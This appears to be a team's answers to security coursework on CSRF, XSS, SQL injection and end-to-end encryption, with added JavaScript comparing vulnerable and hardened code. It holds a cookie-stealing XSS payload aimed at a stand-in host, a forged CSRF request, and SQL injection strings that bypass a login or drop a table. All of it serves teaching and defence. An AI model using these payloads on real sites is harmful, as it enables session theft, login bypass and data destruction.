- What is a CSRF attack? How does it use HTTP requests? And why do we call it the one-click attack?
- What is an XSS attack? And what is the connection between it and cookies/sessions? And what are the two main categories of XSS?
- What is SQL injection? And what is the attacker's goal in using it?
- Consider the SQL query built below. Where is the vulnerability? Think about some ways an attacker could misuse it:
const { username, password } = req.body
let strQry = `SELECT Count(*) FROM Users WHERE username=${username} AND password=${password}`;
- What does end-to-end encryption mean? Give an example of a well-known app that uses E2EE, and explain how that app uses it.
Team Hakimah, Abdullah, Feda
Q1: CSRF: Cross-site request forgery (also known as CSRF) is a web security vulnerability that allows an attacker to induce users to perform actions that they do not intend to perform. For example, this might be to change the email address on their account.
Part 2- The malicious site contains a script, form or image tag that sends an HTTP request (typically a state-changing GET or POST) to a different website (the target site) on which the victim is authenticated. Because the victim is already authenticated on the target site, the browser automatically includes the target site's session cookies with the forged request, so the server cannot tell it apart from a request the victim made deliberately unless it checks something the attacker cannot supply, such as a CSRF token or the Origin header. Part 3: It is called the one-click attack because it typically requires only a single click on a malicious link or a visit to an attacker-controlled page; the forged request is then sent by the victim's own browser without any further interaction.
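The mechanism in Parts 2 and 3 above, shown as a state-changing handler with and without CSRF defences. This is an added example, not part of the team's answer or any real application; the site origin, session store, token value and the two requests are constructed for illustration.

```javascript
// Added example: a "change email" handler with and without CSRF defences, driven by
// two constructed requests. Not part of the original answer; all names are illustrative.
const SITE_ORIGIN = 'https://bank.example'; // assumed origin of the target site

// Server-side session store (constructed). The CSRF token lives in the session and is
// rendered into the site's own forms; a page on another origin cannot read it.
const SESSIONS = {
  'sid-123': { user: 'victim', csrfToken: 'tok-9f8e7d' },
};

function parseCookies(header) {
  const out = {};
  for (const part of (header || '').split(';')) {
    const [name, ...rest] = part.trim().split('=');
    if (name) out[name] = rest.join('=');
  }
  return out;
}

// Vulnerable: the session cookie alone decides. Any page the victim visits can
// trigger this, because the browser attaches the cookie automatically.
function vulnerableChangeEmail(req) {
  const session = SESSIONS[parseCookies(req.headers.cookie).session];
  if (!session) return { status: 401 };
  return { status: 200, user: session.user, newEmail: req.body.email };
}

// Hardened: still requires the cookie, but also a same-origin check and a token
// that only the site's own pages can embed in the form.
function hardenedChangeEmail(req) {
  const session = SESSIONS[parseCookies(req.headers.cookie).session];
  if (!session) return { status: 401 };

  // Browsers set Origin on cross-site POSTs to the attacker's origin (fall back to Referer).
  let origin = req.headers.origin;
  if (!origin && req.headers.referer) origin = new URL(req.headers.referer).origin;
  if (origin !== SITE_ORIGIN) return { status: 403, reason: 'cross-site origin' };

  // Synchronizer token: must match the one stored in the victim's session.
  if (req.body.csrf !== session.csrfToken) return { status: 403, reason: 'missing or wrong CSRF token' };

  return { status: 200, user: session.user, newEmail: req.body.email };
}

// Constructed requests. Both carry the session cookie, because the browser attaches it
// for bank.example regardless of which page submitted the form.
const legitimateRequest = {
  headers: { cookie: 'session=sid-123', origin: SITE_ORIGIN },
  body: { email: 'victim@example.com', csrf: 'tok-9f8e7d' },
};
const forgedRequest = {
  // Submitted by a hidden auto-posting form on https://evil.example after one click.
  headers: { cookie: 'session=sid-123', origin: 'https://evil.example' },
  body: { email: 'attacker@evil.example' },
};
```

The forged request passes the vulnerable handler and is rejected by the hardened one at the origin check; even if the attacker could spoof the origin, the token check would still fail because the attacker's page never sees the victim's token. Setting the session cookie with SameSite=Lax or Strict is a third, independent layer that stops the browser from attaching the cookie to a cross-site POST in the first place.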
Q2- Cross-site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. The connection to cookies/sessions is that once the injected script runs in a victim's browser it runs with the origin of the trusted site, so it can read that site's cookies and session identifiers through document.cookie (unless they are marked HttpOnly) and send them to the attacker, or simply issue requests that ride on the victim's session. The two main categories of XSS are:
1- Persistent (stored) XSS: the malicious script is permanently stored on the target server, for example in a comment or profile field, and is served to every user who views that content.
2- Non-Persistent (reflected) XSS: the malicious script is embedded in a URL or another input and reflected back in the server's immediate response, so the victim has to be lured into following a crafted link.
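The cookie-theft path described in Q2, with the two defences a practitioner would apply: output encoding at the point the untrusted text is rendered, and the HttpOnly flag on the session cookie. This is an added example, not code from the team's answer; the payload, site names and cookie name are constructed.

```javascript
// Added example: how an injected script reaches a victim's cookies, how output
// encoding neutralises it, and how the HttpOnly flag limits the damage.
// Not part of the original answer; the payload and names are constructed.

// Constructed attacker input, e.g. submitted as a comment (stored XSS) or carried
// in a URL parameter that the page echoes back (reflected XSS).
const PAYLOAD = `<script>new Image().src='https://evil.example/c?'+document.cookie</script>`;

// Vulnerable rendering: user input is concatenated straight into the HTML.
function renderCommentUnsafe(author, text) {
  return `<div class="comment"><b>${author}</b>: ${text}</div>`;
}

// Output encoding: the five characters that let text break out of an HTML text
// node or attribute value are replaced with entities, so the browser shows the
// payload as literal text instead of executing it.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

function renderCommentSafe(author, text) {
  return `<div class="comment"><b>${escapeHtml(author)}</b>: ${escapeHtml(text)}</div>`;
}

// Second layer: a session cookie set with HttpOnly is not exposed through
// document.cookie, so even a successful injection cannot exfiltrate it this way.
function sessionCookieHeader(sessionId) {
  return `session=${sessionId}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

// Crude check a reviewer might script over rendered output: does the HTML still
// contain an executable <script> tag?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}
```

Encoding has to match the context (HTML text, attribute, URL, JavaScript string each need different escaping); the function above is correct for HTML text and quoted attribute values, which is where comment bodies usually land. HttpOnly does not stop XSS itself, only this particular way of monetising it: a script that stays on the page can still make requests with the victim's session.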
Q3- SQL injection is a vulnerability that allows an attacker to interfere with the queries an application makes to its database, typically because untrusted input is concatenated into the query text. Part 2: The attacker's goal is unauthorized access to the database: exposure of sensitive information, manipulation or deletion of data, and, in a login query like the one in Q4, bypassing authentication altogether.
Q4- The username and password taken from req.body are interpolated directly into the query string; there is no validation and no parameterization, so whatever the attacker types becomes part of the SQL. The values are not even quoted, so the attacker supplies the quotes themselves: a username of '' OR 1=1 -- turns the WHERE clause into a condition that is true for every row and comments out the password check, so Count(*) is non-zero and the login succeeds; a username of 'admin' -- logs in as a specific account; and where the driver allows stacked statements, 'x'; DROP TABLE Users; -- destroys data. The fix is a parameterized (prepared) query in which the values are passed separately from the SQL text.
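The query builder from Q4 fed with constructed attacker inputs, beside a parameterized version, so the exact SQL the database would receive is visible. This is an added example, not part of the team's answer; the payloads are illustrative and the ? placeholder style is the one used by the mysql2 and sqlite3 drivers (pg uses $1, $2).

```javascript
// Added example: the template-literal query from Q4 driven with constructed attacker
// inputs, beside a parameterised builder. Not part of the original answer.

// The vulnerable builder from the question: values are interpolated into the SQL
// text and, since they are not even quoted, the attacker supplies their own quoting.
function buildQueryUnsafe(username, password) {
  return `SELECT Count(*) FROM Users WHERE username=${username} AND password=${password}`;
}

// Hardened: the SQL text is constant; the values travel separately and the driver
// hands them to the database as data, never as SQL.
function buildQuerySafe(username, password) {
  return {
    text: 'SELECT Count(*) FROM Users WHERE username=? AND password=?',
    values: [username, password],
  };
}

// Constructed attacker inputs for the login form.
const PAYLOADS = {
  // Closes the string, adds a tautology, comments out the password check:
  // the count is > 0 for any non-empty table, so the login succeeds.
  bypassAuth: { username: "'' OR 1=1 --", password: 'anything' },
  // Targets a specific account and removes the password check.
  impersonateAdmin: { username: "'admin' --", password: '' },
  // Stacked statement; succeeds only where the driver allows multiple statements.
  dropTable: { username: "'x'; DROP TABLE Users; --", password: '' },
};

// Build what the database would actually receive for each payload.
function unsafeQueriesForPayloads() {
  const out = {};
  for (const [name, p] of Object.entries(PAYLOADS)) {
    out[name] = buildQueryUnsafe(p.username, p.password);
  }
  return out;
}

// With parameters, the same inputs never change the SQL text.
function safeTextIsConstant() {
  const base = buildQuerySafe('alice', 'pw').text;
  return Object.values(PAYLOADS).every(
    (p) => buildQuerySafe(p.username, p.password).text === base,
  );
}
```

Note that the unquoted interpolation in the original also breaks ordinary logins (username=alice is read as a column reference), which is the kind of bug that gets "fixed" by adding quotes around the placeholders; that makes the query work but leaves the injection intact, since a quote in the input still terminates the string. Only the parameterized form removes the problem.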
Q5- End-to-end encryption (E2EE) is a method of secure communication in which data is encrypted on the sender's device and can only be decrypted on the intended recipient's device, so no third party, including the service provider that relays the messages, can read it in transit. Apps: WhatsApp and Facebook Messenger. How WhatsApp uses it:
WhatsApp's end-to-end encryption is built on the Signal Protocol, designed by Open Whisper Systems. Each device generates its own key pairs and registers only the public keys with WhatsApp's servers; when you message someone, your device agrees a shared secret with the recipient's device (the X3DH key agreement) and then derives a fresh key for every message (the Double Ratchet). Messages, photos and videos are encrypted with those keys before they leave your device, and only the recipient's device holds the private keys needed to decrypt them, so WhatsApp's servers relay ciphertext they cannot read.